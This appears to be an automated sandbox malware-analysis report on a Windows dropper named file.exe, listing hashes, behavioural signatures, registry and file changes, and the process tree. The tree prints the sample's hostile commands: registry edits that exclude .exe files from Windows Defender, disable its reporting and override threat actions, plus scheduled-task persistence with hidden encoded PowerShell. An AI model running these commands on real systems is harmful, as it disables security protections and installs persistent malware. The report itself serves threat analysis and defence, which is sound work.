Analysis
-
max time kernel
91s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
04-01-2023 22:09
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
3cd7c42d2c7a1925a87b56ba30cdde73
-
SHA1
4936577e46bcb848f7b34f1039d819b04ff40fbc
-
SHA256
a66391f2f3e69aaa7554de8d6b9019839e376fcc25a89926e6912a0d57e9f960
-
SHA512
60770143900ce634d4f6b8051240ae9bb1489aeedcff71635d4279c680245ff26afe6362fc26a7fb96a7d8ac264a9c258a6546accdf346c6e2ced74d58291246
-
SSDEEP
196608:91Ol/maBX2YjppjTHcObIqVi0FtoEBg17p7wJufo7:3OxpBrHcYIqnFtoE21heki
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 57 4624 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 4896 Install.exe 1284 Install.exe 2016 YkntXUp.exe 3992 IqdCyRw.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation IqdCyRw.exe -
Loads dropped DLL 1 IoCs
pid Process 4624 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json IqdCyRw.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini IqdCyRw.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content IqdCyRw.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini YkntXUp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol YkntXUp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA IqdCyRw.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 IqdCyRw.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 IqdCyRw.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IqdCyRw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA IqdCyRw.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak IqdCyRw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja IqdCyRw.exe File created C:\Program Files (x86)\VPYaDjxZBwAU2\iFrQYyw.xml IqdCyRw.exe File created C:\Program Files (x86)\VuDzvJgGU\TPwIrb.dll IqdCyRw.exe File created C:\Program Files (x86)\ZGnoZfjlmqUn\tDaQYcM.dll IqdCyRw.exe File created C:\Program Files (x86)\VuDzvJgGU\wHnIpIA.xml IqdCyRw.exe File created C:\Program Files (x86)\qmPxrUzoObJDycnPoNR\ssKSjIp.dll IqdCyRw.exe File created C:\Program Files (x86)\VPYaDjxZBwAU2\QTgPTwCIDrWbO.dll IqdCyRw.exe File created C:\Program Files (x86)\qmPxrUzoObJDycnPoNR\awShcvn.xml IqdCyRw.exe File created C:\Program Files (x86)\sZZRdZcplUZcC\UiBXEQN.dll IqdCyRw.exe File created C:\Program Files (x86)\sZZRdZcplUZcC\LgfqmRM.xml IqdCyRw.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi IqdCyRw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi IqdCyRw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak IqdCyRw.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bkuWmsEVxSoFBLrMoP.job schtasks.exe File created C:\Windows\Tasks\MMXfBASmfLrLvsZVI.job schtasks.exe File created C:\Windows\Tasks\XKFBGwgxrEulmgf.job schtasks.exe File created C:\Windows\Tasks\gPnQnOXuswVFDBxMw.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4080 schtasks.exe 3136 schtasks.exe 3644 schtasks.exe 732 schtasks.exe 4716 schtasks.exe 1544 schtasks.exe 3820 schtasks.exe 4280 schtasks.exe 756 schtasks.exe 4720 schtasks.exe 3780 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" IqdCyRw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer IqdCyRw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume IqdCyRw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing IqdCyRw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000}\MaxCapacity = "15140" IqdCyRw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket IqdCyRw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" IqdCyRw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" IqdCyRw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ IqdCyRw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix IqdCyRw.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 2860 powershell.EXE 2860 powershell.EXE 3776 powershell.exe 3776 powershell.exe 2332 powershell.exe 2332 powershell.exe 3012 powershell.EXE 3012 powershell.EXE 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe 3992 IqdCyRw.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2860 powershell.EXE Token: SeDebugPrivilege 3776 powershell.exe Token: SeDebugPrivilege 2332 powershell.exe Token: SeDebugPrivilege 3012 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4960 wrote to memory of 4896 4960 file.exe 80 PID 4960 wrote to memory of 4896 4960 file.exe 80 PID 4960 wrote to memory of 4896 4960 file.exe 80 PID 4896 wrote to memory of 1284 4896 Install.exe 81 PID 4896 wrote to memory of 1284 4896 Install.exe 81 PID 4896 wrote to memory of 1284 4896 Install.exe 81 PID 1284 wrote to memory of 4596 1284 Install.exe 82 PID 1284 wrote to memory of 4596 1284 Install.exe 82 PID 1284 wrote to memory of 4596 1284 Install.exe 82 PID 1284 wrote to memory of 4832 1284 Install.exe 84 PID 1284 wrote to memory of 4832 1284 Install.exe 84 PID 1284 wrote to memory of 4832 1284 Install.exe 84 PID 4596 wrote to memory of 1692 4596 forfiles.exe 86 PID 4596 wrote to memory of 1692 4596 forfiles.exe 86 PID 4596 wrote to memory of 1692 4596 forfiles.exe 86 PID 4832 wrote to memory of 1444 4832 forfiles.exe 87 PID 4832 wrote to memory of 1444 4832 forfiles.exe 87 PID 4832 wrote to memory of 1444 4832 forfiles.exe 87 PID 1692 wrote to memory of 3724 1692 cmd.exe 88 PID 1692 wrote to memory of 3724 1692 cmd.exe 88 PID 1692 wrote to memory of 3724 1692 cmd.exe 88 PID 1444 wrote to memory of 4996 1444 cmd.exe 89 PID 1444 wrote to memory of 4996 1444 cmd.exe 89 PID 1444 wrote to memory of 4996 1444 cmd.exe 89 PID 1692 wrote to memory of 4492 1692 cmd.exe 90 PID 1692 wrote to memory of 4492 1692 cmd.exe 90 PID 1692 wrote to memory of 4492 1692 cmd.exe 90 PID 1444 wrote to memory of 3040 1444 cmd.exe 91 PID 1444 wrote to memory of 3040 1444 cmd.exe 91 PID 1444 wrote to memory of 3040 1444 cmd.exe 91 PID 1284 wrote to memory of 4080 1284 Install.exe 95 PID 1284 wrote to memory of 4080 1284 Install.exe 95 PID 1284 wrote to memory of 4080 1284 Install.exe 95 PID 1284 wrote to memory of 4604 1284 Install.exe 97 PID 1284 wrote to memory of 4604 1284 Install.exe 97 PID 1284 wrote to memory of 4604 1284 Install.exe 97 PID 2860 wrote to memory of 3440 2860 powershell.EXE 101 PID 2860 wrote to memory of 3440 2860 powershell.EXE 101 PID 1284 wrote to memory of 540 1284 Install.exe 109 PID 1284 wrote to memory of 540 1284 Install.exe 109 PID 1284 wrote to memory of 540 1284 Install.exe 109 PID 1284 wrote to memory of 4716 1284 Install.exe 111 PID 1284 wrote to memory of 4716 1284 Install.exe 111 PID 1284 wrote to memory of 4716 1284 Install.exe 111 PID 2016 wrote to memory of 3776 2016 YkntXUp.exe 115 PID 2016 wrote to memory of 3776 2016 YkntXUp.exe 115 PID 2016 wrote to memory of 3776 2016 YkntXUp.exe 115 PID 3776 wrote to memory of 3832 3776 powershell.exe 117 PID 3776 wrote to memory of 3832 3776 powershell.exe 117 PID 3776 wrote to memory of 3832 3776 powershell.exe 117 PID 3832 wrote to memory of 2088 3832 cmd.exe 118 PID 3832 wrote to memory of 2088 3832 cmd.exe 118 PID 3832 wrote to memory of 2088 3832 cmd.exe 118 PID 3776 wrote to memory of 2380 3776 powershell.exe 119 PID 3776 wrote to memory of 2380 3776 powershell.exe 119 PID 3776 wrote to memory of 2380 3776 powershell.exe 119 PID 3776 wrote to memory of 4420 3776 powershell.exe 120 PID 3776 wrote to memory of 4420 3776 powershell.exe 120 PID 3776 wrote to memory of 4420 3776 powershell.exe 120 PID 3776 wrote to memory of 4664 3776 powershell.exe 121 PID 3776 wrote to memory of 4664 3776 powershell.exe 121 PID 3776 wrote to memory of 4664 3776 powershell.exe 121 PID 3776 wrote to memory of 4112 3776 powershell.exe 122 PID 3776 wrote to memory of 4112 3776 powershell.exe 122
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Users\Admin\AppData\Local\Temp\7zSC623.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Users\Admin\AppData\Local\Temp\7zSC9CD.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:3724
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4492
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4996
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:3040
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giysAoZTj" /SC once /ST 18:41:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giysAoZTj"4⤵PID:4604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giysAoZTj"4⤵PID:540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bkuWmsEVxSoFBLrMoP" /SC once /ST 22:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK\OFBXxGvsibabdhk\YkntXUp.exe\" m7 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4716
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3440
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3104
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3156
-
C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK\OFBXxGvsibabdhk\YkntXUp.exeC:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK\OFBXxGvsibabdhk\YkntXUp.exe m7 /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 